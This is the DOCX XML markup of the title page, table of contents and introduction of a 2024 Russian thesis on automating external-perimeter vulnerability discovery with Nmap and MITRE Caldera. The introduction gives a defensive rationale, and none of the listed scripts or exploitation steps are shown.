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0097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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Учебный центр</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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 xml:space="preserve">OOO «Скилфэктори» </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276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совместно с </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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 xml:space="preserve">Федеральное государственное автономное </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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 xml:space="preserve">образовательное учреждение высшего образования </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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"Национальный исследовательский ядерный университет «МИФИ».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276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Выпускная квалификационная работа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276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на тему:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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 xml:space="preserve">“Метод и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>система сбора поверхности атаки для внешнего периметра организации”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276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Программа дополнительного профессионального образования </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276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“Информационная безопасность”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="5485" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Выполнили студент </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="5485" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>группы MIFIIB-3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="5485" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Романов Алексей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="5485" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="5485" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="5485" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Научный руководитель</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="5485" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Серов Сергей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276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Москва</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:spacing w:line="276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>2024 год</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:sectPr w:rsidR="00C20097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evenPage"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1738" w:right="850" w:bottom="720" w:left="1133" w:header="1133" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="100" w:charSpace="-36865"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Serif CJK SC"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="1185026340"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Оглавление</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"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047_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>2</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1344_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Поиск уязвимостей: Nmap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1604_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Определение цели сканирования</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1606_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Обнаружение хостов</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc907_3518165554">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Скрипт для поиска уязвимостей</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1608_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Эксплуатация уязвимостей: Mitre Caldera</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc909_3518165554">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Agents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc930_3518165554">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Ability</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc911_3518165554">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Adversary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc913_3518165554">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Operations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>13</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1616_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Практи</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>ческая часть</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>15</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1618_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Лабораторная инфраструктура</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>15</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc814_2337190046">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>15</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1632_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Тестовые машины и сервисы</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>16</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1636_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Работа скрипта</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>17</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1638_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Namp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>17</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1640_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Caldera</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>20</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1642_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Результаты работы</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>25</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1644_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Выводы</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>26</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1041_3518165554">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Список использованных ресурсов</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>27</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1646_3290770187">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Приложения</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>28</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1043_3518165554">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Приложение № 1. ScanDlCalOp.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:tab/>
              <w:t>28</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__RefHeading___Toc1047_3290770187"/>
      <w:bookmarkStart w:id="1" w:name="_z26igsm04580"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="723"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В современном мире уровень развития информационных технологий  и их интеграции во всё сферы жизни достиг очень высоких значений и продолжает неуклонно расти. В</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> том числе активно развиваются всевозможные сетевые решения и онлайн  сервисы с возможностью удалённого доступа. И если ещё несколько лет назад такие решения в основном использовали крупные компании имеющие значительные бюджеты на развёртывание, поддержани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е и обеспечение безопасности своей инфраструктуры, то сейчас даже для небольшой компании и частного лица есть возможность, а иногда даже необходимость, развернуть собственное облачное хранилище, сайт, почтовый сервер, сервер видеосвязи, предоставить удалён</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ное рабочее место сотруднику или другим образом использовать ресурсы своего оборудования. Зачастую реализация подобных задач возлагается на системных администраторов и выполняется самым простым образом по инструкциям из интернета с единственной целью «глав</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ное чтобы работало».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="723"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Такое развёртывание сервисов чревато получением всевозможных уязвимостей, эксплуатация которых третьими лицами может привести различным последствиям от банальной потери времени на переустановку системы до огромных финансовых и репутаци</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">онных убытков вызванных нарушением доступности чувствительной информации (например действиями шифровальщиков). Так же проникновение внешнего нарушителя в сеть может стать проблемой для организации или частного лица в случае использования их оборудования в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">качестве Proxy-сервера для атаки на важные государственные или промышленные информационные системы. Таки образом необходимость обеспечения информационной безопасности инфраструктуры на внешнем периметре становится актуальна для огромного числа организаций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и частных лиц.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="723"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ограниченность бюджетов большинства организаций и отсутствие обработки критически важной информации, то есть отсутствии рисков </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>значительных финансовых потерь в случае атаки, приводит к отказу от дорогостоящих решений и специалистов  в област</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и информационной безопасности. Таким образом мы приходим к потребности в не дорогом или бесплатном средстве, способном находить уязвимости на внешнем периметре организации и проверять возможность их эксплуатации общедоступными средствам с целью  выдачи рек</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>омендаций по дальнейшему их устранению. Так же возможно устранение уязвимости по средствам самого установленного агента в ручном режиме или дальнейший RedTeaming и развитие атаки и поиск уязвимостей уже во внутреннем периметре организации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C20097">
      <w:pPr>
        <w:ind w:firstLine="723"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
        <w:ind w:firstLine="723"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C20097" w:rsidRDefault="00C26DD2">
      <w:pPr>
